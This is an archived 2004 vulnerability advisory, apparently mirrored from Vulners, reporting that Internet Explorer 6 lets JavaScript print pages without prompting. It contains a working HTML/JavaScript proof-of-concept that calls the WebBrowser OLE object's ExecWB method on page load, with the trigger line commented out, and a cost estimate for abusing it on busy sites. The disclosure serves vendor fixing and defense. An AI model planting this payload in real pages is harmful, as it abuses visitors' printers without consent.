Vulners
Lucene search
MSIE.printer.txt
`#######################################################################
Ben Garvey
Application: Microsoft Internet Explorer
Versions: 6.0
Platforms: Windows
Bugs: IE 6 allows JavaScript to send documents to the printer
without prompting the user.
Exploitation: Client
Date: 12 April 2004
Author: Ben Garvey
[email protected]
http://www.bengarvey.com
Bugtraq report format: Thanks Luigi Auriemma!
#######################################################################
===============
1) Introduction
===============
Microsoft Internet Explorer is the dominant web browser on the world's PCs.
Any exploits or bugs found hurt millions of users.
Like anyone here needed to know that or is surprised.
#######################################################################
===============
2) Bug summary
===============
Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious
document to send pages to the printer without prompting the user.
Printing documents without prompting the user could result in the waste
of paper, toner, ink or result in damage to the printer. If inserted into
a high traffic website this waste could be substantial.
$ of paper x printed sheets x web traffic x % of IE Users = $total waste
in paper
If paper costs a penny per sheet ($5 for 500 sheets)
We average about 10 sheets printed per user before they realize what's
happening (conservative estimate)
It's used on a high traffic website (1 million unique visitors)
IE's market share is about 90%.
$0.01 x 10 per user x 1 million x 0.90 = $90,000 in damages
This doesn't even include costs associated with toner and time.
===============
3) Exploit
===============
The following is an example of the exploit. The offending line must be
uncommented to activate it. Remove any linebreaks that break the
JavaScript.
<HTML>
<HEAD>
<SCRIPT language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{ // Create OLE Object
var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0
CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';
// Place Object on page
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
// if intOLEparam is not defined, set it
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || (
intOLEparam > 1) )
intOLEparam = 1;
// Execute Object
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
// Destroy Object
WebBrowser1.outerHTML = "";
}
function printAll()
{
// Uncomment this to enable the exploit!
//ieExecWB(6,-1);
}
</SCRIPT>
</HEAD>
<BODY onload="printAll()">
<h3>I like your PRINTER</h3>
</BODY>
</HTML>
===============
4) Conclusion
===============
I can't think of any reasonable use for allowing IE to print stuff
without my permission.
This bug should be fixed as soon as possible.
-----
Ben Garvey
[email protected]
http://www.bengarvey.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2004 00:00Current
7.4High risk
Vulners AI Score7.4